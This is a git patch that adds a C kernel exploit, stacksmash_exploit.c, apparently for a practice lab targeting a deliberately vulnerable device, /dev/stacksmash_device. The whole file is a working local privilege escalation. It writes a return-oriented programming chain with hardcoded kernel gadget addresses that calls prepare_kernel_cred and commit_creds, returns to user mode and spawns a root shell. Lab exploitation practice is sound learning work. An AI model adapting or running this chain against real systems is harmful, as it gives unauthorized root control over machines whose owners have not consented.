From befe99ac8710226a70cb1a5db23c0022192cafc6 Mon Sep 17 00:00:00 2001
From: Jack Ren <admin@renjikai.com>
Date: Thu, 19 Sep 2024 20:30:20 +0800
Subject: [PATCH] Added exploit for KROP_LPE

---
 ROP/KROP_LPE/stacksmash_exploit.c | 69 +++++++++++++++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 ROP/KROP_LPE/stacksmash_exploit.c

diff --git a/ROP/KROP_LPE/stacksmash_exploit.c b/ROP/KROP_LPE/stacksmash_exploit.c
new file mode 100644
index 0000000..a66eec0
--- /dev/null
+++ b/ROP/KROP_LPE/stacksmash_exploit.c
@@ -0,0 +1,69 @@
+#include <errno.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define DEVICE_NAME "/dev/stacksmash_device"
+
+int64_t user_cs, user_rflags, user_rsp, user_ss;
+
+void save_registers() {
+  asm("movq %%cs, %[user_cs]\n"
+      "movq %%ss, %[user_ss]\n"
+      "movq %%rsp, %[user_rsp]\n"
+      "pushfq\n"
+      "popq %[user_rflags]\n"
+      : [user_cs] "=r"(user_cs), [user_ss] "=r"(user_ss),
+        [user_rsp] "=r"(user_rsp), [user_rflags] "=r"(user_rflags));
+}
+
+void shell() { system("/bin/sh"); }
+
+int main(int argc, char **argv) {
+  save_registers();
+  int ret, fd;
+  uint64_t payload[] = {
+      0x1,
+      0x2,
+      0x3,
+      0x4,
+      0x5,
+      0xffffffff8103fb8d, /* pop rdi; ret */
+      0x0,
+      0xffffffff810c5900, /* prepare_kernel_cred */
+      0xffffffff813db97a, /* pop rcx; ret */
+      0x0,
+      0xffffffff81b1d5cf, /* mov rdi, rax ; xor eax, eax ; rep movsb byte ptr
+                             [rdi], byte ptr [rsi] ; ret */
+      0xffffffff810c5490, /* commit_creds */
+      0xffffffff81c00f50 +
+          22,         /* swapgs_restore_regs_and_return_to_usermode + 22 */
+      0x0,            /* Extra rax */
+      0x0,            /* Extra rdi */
+      (uint64_t)shell, /* rip */
+      user_cs,
+      user_rflags,
+      user_rsp,
+      user_ss};
+
+  fd = open(DEVICE_NAME, O_RDWR);
+  if (fd < 0) {
+    puts("Failed to open device\n");
+    return (-1);
+  }
+  ret = write(fd, payload, sizeof(payload));
+  if (ret < 0) {
+    puts("Failed to write to device\n");
+    return (-1);
+  }
+
+  return (0);
+}
+
+// https://github.com/pr0cf5/kernel-exploit-practice/tree/master/return-to-user
+// https://tttang.com/archive/1606/#toc_version-1-trampoline-goes-weeeh
+// https://www.yijinglab.com/specialized/20230704083315
+// https://bbs.kanxue.com/thread-276403.htm
\ No newline at end of file